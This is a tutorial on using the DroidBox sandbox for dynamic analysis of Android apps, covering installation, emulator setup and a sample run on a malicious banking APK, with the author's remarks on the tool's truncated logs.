How to perform Dynamic analysis of an android application using DroidBox

DroidBox is developed to offer dynamic analysis of Android App Data.

The following information listed down below are the results shown and generated.

• Hashes for the analyzed package
• Incoming/outgoing network data
• File read and write operations
• Started services and loaded classes through DexClassLoader
• Information leaks via the network, file and SMS
• Circumvented permissions
• Cryptography operations performed using Android API
• Listing broadcast receivers
• Sent SMS and phone calls

Additionally, two images are generated visualizing the behavior of the package. One showing the temporal order of the operations and the other one being a treemap that can be used to check similarity between analyzed packages.

Here is the Source Code for DROIDBOX : LINK.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.

Requirements for DroidBox

• First you need to install some apps to use DroidBox and make sure the relevant packages installed

<code class="language-shell">root<span class="variable">@kali</span><span class="symbol">:~</span><span class="comment"># apt-get install python-virtualenv libatlas-dev liblapack-dev libblas-dev


</span></code>

You’ll need those in order to use scipy, matplotlib and numpy along with Droidbox. Now create a virtual environment and install pythondependencies:

<code class="language-shell">root<span class="variable">@kali</span><span class="symbol">:~/work/apk</span><span class="comment"># mkdir env</span>
root<span class="variable">@kali</span><span class="symbol">:~/work/apk</span><span class="comment"># virtualenv env</span>
...
root<span class="variable">@kali</span><span class="symbol">:~/work/apk</span><span class="comment"># source env/bin/activate</span>
(env)root<span class="variable">@kali</span><span class="symbol">:~/work/apk</span><span class="comment"># pip install numpy scipy matplotlib</span></code>

Install Droidbox

import os
import sys

# Setup new PATH
old_path = os.environ['PATH']
new_path = old_path + ":" + "/root/work/apk/SDK/android-sdk-linux/tools:/root/work/apk/SDK/android-sdk-linux/platform-tools:/root/work/apk/SDK/android-sdk-linux/build-tools/19.1.0"
os.environ['PATH'] = new_path

# Change working directory
os.chdir("/root/work/apk/DroidBox_4.1.1/")

Setup IPython settings

%pylab inline
import binascii
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import datetime as dt
import time
import ipy_table
from IPython.display import display_pretty, display_html, display_jpeg, display_png, display_json, display_latex, display_svg
from IPython.display import HTML
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# Ipython settings
pd.set_option('display.height', 1000)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_colwidth', 100)
pd.set_option('display.width', 1000)
pd.set_option('display.column_space', 1000)

Now create Android Virtual Device

You can install it in your own android device but also you can use android device virtual machine if that is the case.

Here the Command to create the Android Virtual Device

<code># android create avd --abi default/armeabi-v7a -n android-4.1.2-droidbox -t 1 -c 1000M
Android 4.1.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'android-4.1.2-droidbox' based on Android 4.1.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
hw.sdCard=yes
vm.heapSize=48

</code>

Run DroidBox

Waiting for the device...
Installing the application /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk...
Running the component com.gmail.xpack/com.gmail.xpack.MainActivity...
Starting the activity com.gmail.xpack.MainActivity...
Application started
Analyzing the application during infinite time seconds...
^C

DroidBox will then listen for activities until you kill it by ^C.

Meanwhile I was interacting with the APP and saw that DroidBox was collecting the logs during the interacttions.

Now DroidBox will track

• File System Activities
• Network Activities
• Sent Data
• Received Data
• Request Sequence
• Crypto activities
• Activities Chart

I think DroidBox is a very good tool to deal with Android APKs and analyze their behaviour during run-time. It comes with a working mobile sandbox meant to inspect and monitor an applications activities. However during my analysis I had to rely on previous analysis since the results didn’t contain the full details. Not only the network traffic but also the contents read from files weren’t complete. In order to fully unterstand one malware I need complete details about its behaviour. For example I had following response from the server which is completely useless:

<code>HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...
</code>

Besides that I was indeed able to see that the application is reading from some file. But the delivered content was once again striped:

<code>&lt;?xml version='1.0' encoding='utf-8' standalone='yes' ?&gt;\n&lt;map&gt;\n&lt;string name="DOWNLOADDOMAIN"&gt;c...

</code>